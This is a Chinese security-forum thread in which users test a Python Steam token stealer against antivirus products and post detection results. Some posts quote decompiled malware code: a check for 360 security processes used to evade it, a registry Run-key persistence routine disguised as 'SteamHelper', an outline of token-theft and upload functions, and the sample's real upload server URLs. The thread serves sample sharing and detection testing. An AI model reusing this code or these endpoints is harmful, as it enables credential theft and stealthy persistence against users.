偷steam的东西

xiaozhu009

1.pyc是源文件
1.py是反编译之后的代码

dd2006

瑞星 kill
华为 miss
红伞 miss
SEP miss

居然还检测数字软件：

1. def check_360_running():
   
2.     try:
   
3.         output = subprocess.check_output("tasklist", shell=True, text=True, timeout=10)
   
4.         process_list = output.lower()
   
5.         qihoo_processes = ['360tray.exe', '360sd.exe', 'zhudongfangyu.exe',
   
6.          '360safe.exe',
   
7.          'safemon.exe', 'liveud.exe']
   
8.         for proc in qihoo_processes:
   
9.             if proc in process_list:
   
10.                 return True
    
11. 
    
12.         return False
    
13.     except Exception as e:
    
14.         try:
    
15.             return False
    
16.         finally:
    
17.             e = None
    
18.             del e
    
19. 
    
20. 
    
21. def add_to_startup():
    
22.     try:
    
23.         key_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    
24.         key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_SET_VALUE)
    
25.         exe_path = sys.executable
    
26.         script_path = os.path.abspath(__file__)
    
27.         cmd = f'"{exe_path}" "{script_path}"'
    
28.         winreg.SetValueEx(key, "SteamHelper", 0, winreg.REG_SZ, cmd)
    
29.         winreg.CloseKey(key)
    
30.         print("[启动项] 已成功添加到注册表启动项")
    
31.         return True
    
32.     except Exception as e:
    
33.         try:
    
34.             return False
    
35.         finally:
    
36.             e = None
    
37.             del e
    
38. 
    
39. 
    
40. def init_startup():
    
41.     try:
    
42.         if check_360_running():
    
43.             print("[启动项] 检测到360正在运行，跳过添加启动项")
    
44.         else:
    
45.             print("[启动项] 未检测到360，准备添加启动项")
    
46.             add_to_startup()
    
47.     except:
    
48.         pass

复制代码

莒县小哥

WGC_ZY

ESSP miss

rok827

火绒

微微的笑

1. # 检测防病毒软件
   
2. def check_360_running()
   
3. 
   
4. # 添加到Windows启动项
   
5. def add_to_startup()
   
6. 
   
7. # 从Steam进程内存中扫描并窃取令牌
   
8. def extract_memory_token()
   
9. 
   
10. # 从本地配置文件中解密并窃取令牌
    
11. def extract_decrypt_tokens()
    
12. 
    
13. # 将窃取的数据发送到攻击者服务器
    
14. def upload_memory_token(steam_id, token)

复制代码

1. # 三个不同的服务器端口，用于上传不同方式窃取的数据
   
2. "http://peaceful.to:8551/aee.php"    # 主内存令牌
   
3. "http://154.23.195.205:8551/aee.php"
   
4. "http://peaceful.to:8552/aee.php"    # 旧版内存令牌
   
5. "http://154.23.195.205:8552/aee.php"
   
6. "http://peaceful.to:8550/aee.php"    # 解密令牌
   
7. "http://154.23.195.205:8550/aee.php"

复制代码

AMD_Ryzen

BEST 扫描miss

MrDeep

ESET开双浅解压
1.pyc——Python/PSW.Agent.EDL trojan

管家18
1.py——Win32.Trojan.LummaStealer.Zwhl
1.pyc——Win32.Trojan.LummaStealer.Tdkl

WGC_ZY

MrDeep 发表于 2026-1-29 16:04
ESET开双浅解压
1.pyc——Python/PSW.Agent.EDL trojan

诶竟然这么快就能查杀了，我测那会儿还啥反应都没有，于是点了个提交样本。刚一复测果然行了。

一成不变

卡巴扫描kill 2x
腾管扫描kill 2x